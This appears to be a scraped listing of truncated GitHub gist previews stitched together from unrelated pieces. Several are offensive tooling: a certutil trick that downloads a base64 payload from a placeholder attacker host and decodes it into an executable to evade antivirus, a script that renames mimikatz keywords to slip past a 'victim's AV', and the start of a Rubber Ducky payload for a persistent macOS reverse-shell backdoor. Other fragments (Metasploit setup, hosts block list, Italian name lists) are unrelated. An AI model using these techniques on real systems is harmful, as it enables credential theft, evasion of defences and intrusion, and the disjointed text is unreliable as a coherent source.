https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png
![](https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png | width=100)
# certutil.exe bypass av on download + base64 Decoding | |
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text. | |
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file | |
#into the executable. https://www.browserling.com/tools/file-to-base64 | |
#This is illustrated in Xavier Mertens handler diary. | |
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt | |
C:\Temp>certutil.exe -decode bad.txt bad.exe |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/windows | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
EM A simple script for creating a persistent backdoor on OSX. | |
REM Change mysite.com to your domain name or IP address | |
REM Change 1337 to your port number | |
REM Catch the shell with 'nc -l -p 1337' | |
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ | |
DELAY 1000 | |
GUI SPACE | |
STRING terminal | |
DELAY 500 | |
ENTER |
0.0.0.0 feedback.microsoft-hohm.com | |
0.0.0.0 search.msn.com | |
0.0.0.0 a.ads1.msn.com | |
0.0.0.0 a.ads2.msn.com | |
0.0.0.0 a.rad.msn.com | |
0.0.0.0 ac3.msn.com | |
0.0.0.0 ads.msn.com | |
0.0.0.0 ads1.msn.com | |
0.0.0.0 b.ads1.msn.com | |
0.0.0.0 b.rad.msn.com |
This post links my 3Box profile to my Github account! Web3 social profiles by 3Box. | |
✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅ | |
Create your profile today to start building social connection and trust online at https://3Box.io/ |
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux | |
1.) Enable Developer Mode | |
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1" | |
2.) Enable Windows Subsystem for Linux | |
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux | |
3.) Reboot |
-- DISCLAIMER -- | |
il presente elenco consiste in una raccolta di cognomi presenti sul territorio italiano (non necessariamente "italiani") | |
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
è pertanto altamente possibile che ci siano errori o refusi | |
non è ne pretende di essere un elenco omnicomprensivo di tutti i cognomi esistenti | |
---------------- | |
abbondanza | |
abu | |
accadia |
-- DISCLAIMER -- | |
il presente elenco consiste in una raccolta di nomi presenti sul territorio italiano (non necessariamente "italiani") | |
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
è pertanto altamente possibile che ci siano errori o refusi | |
non è nè pretende di essere un elenco omnicomprensivo di tutti i nomi esistenti | |
---------------- | |
abaco | |
abbondanza | |
abbondanzia |
# script by JonnyBanana | |
#https://github.com/JonnyBanana | |
# this simple script asks to assign a name to a variable | |
#and then asks how many variables it must print on the monitor | |
# the output is like: | |
# a1 = '' | |
# a2 = '' | |
# a3 = '' | |
# a4 = '' | |
# a5 = '' |